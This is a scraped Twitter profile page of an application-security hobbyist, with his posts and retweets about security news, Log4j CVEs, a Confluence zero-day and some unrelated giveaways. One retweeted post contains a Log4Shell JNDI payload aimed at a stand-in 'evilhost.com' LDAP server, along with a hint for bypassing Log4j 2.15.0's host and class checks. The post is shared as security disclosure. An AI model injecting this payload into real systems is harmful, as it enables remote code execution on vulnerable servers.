Jerrin Jacob

552 posts

Jerrin Jacob

Jerrin Jacob

@JerrinJacob26

Appsec enthusiast. Always in for learning. love tinkering and coding whenever possible.

Entrou em Eylül 2015
358 Seguindo58 Seguidores
Jerrin Jacob retweetou
Rachel Tobac
Rachel Tobac@RachelTobac·
🔑How does a FIDO security key limit the hacks we're seeing in the news now?🔑 Beyond fun to work with @Yubico & partner with @Twitter to answer that question + demo how social engineering is used to steal passwords & siphon out MFA codes to gain admin access with @EvanTobac.
English
39
217
699
0
Jerrin Jacob
Jerrin Jacob@JerrinJacob26·
@ropnop Yeah I have referred to it countless times given that it's so tricky. And I am so glad you wrote a blog on it.
English
0
0
1
0
Jerrin Jacob
Jerrin Jacob@JerrinJacob26·
Huge shoutout to @ropnop on this article blog.ropnop.com/talk/2020/dont… of SOP, CORS and CSRF. I don't know how many times I have referred to this blog to make sure I understand these concepts properly. Looking forward to more of these.🙌
English
1
3
12
0
NVIDIA GeForce
NVIDIA GeForce@NVIDIAGeForce·
🔥 Summer of RTX keeps on giving 🔥 We have 15 GeForce RTX 3080 Ti GPUs up for grabs👀 Want one?! Let us know the first GPU you gamed on + comment #RTXON👇
NVIDIA GeForce tweet media
English
15.4K
2.5K
9.6K
0
Jerrin Jacob retweetou
briankrebs
briankrebs@briankrebs·
Atlassian is warning about a zero-day in Confluence (CVE-2022-26134). This is a pre-auth, remote code execution bug. No patch yet. Atlassian credits @Volexity which reported it after responding to different victims who got shells/backdoors via this flaw. confluence.atlassian.com/doc/confluence…
English
9
92
190
0
Jerrin Jacob retweetou
Márcio Almeida
Márcio Almeida@marcioalm·
FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} and to bypass allowedClasses just choose a name for a class in the JDK. Deserialization will occur as usual. #Log4Shell 1/n
English
15
366
965
0
Jerrin Jacob retweetou
Alvaro Muñoz
Alvaro Muñoz@pwntester·
CVE-2021-45046 is vulnerable when attackers can control **non-message** parts of the pattern layout. Here are some examples 🧵
English
5
102
346
0
Made by Google
Made by Google@madebygoogle·
#TeamPixel we're 14 days into October, time for a 🍁 color check. Snap a pic and share the leaves in your area.
English
265
60
1.1K
0
Jerrin Jacob retweetou
Engineering
Engineering@Engineering·
Calling all bounty hunters - it’s officially go time! We’ve just released the full details of our algorithmic bias bounty challenge which is open through August 6. For more details on the challenge, head over to our blog 👇 blog.twitter.com/engineering/en…
English
11
272
480
0
Jerrin Jacob
Jerrin Jacob@JerrinJacob26·
@GamersNexus Just received mine. Thank you so much. It looks and feels awesome. Although I was hoping I would be lucky with the the signed ones. 😅
Jerrin Jacob tweet media
English
0
0
0
0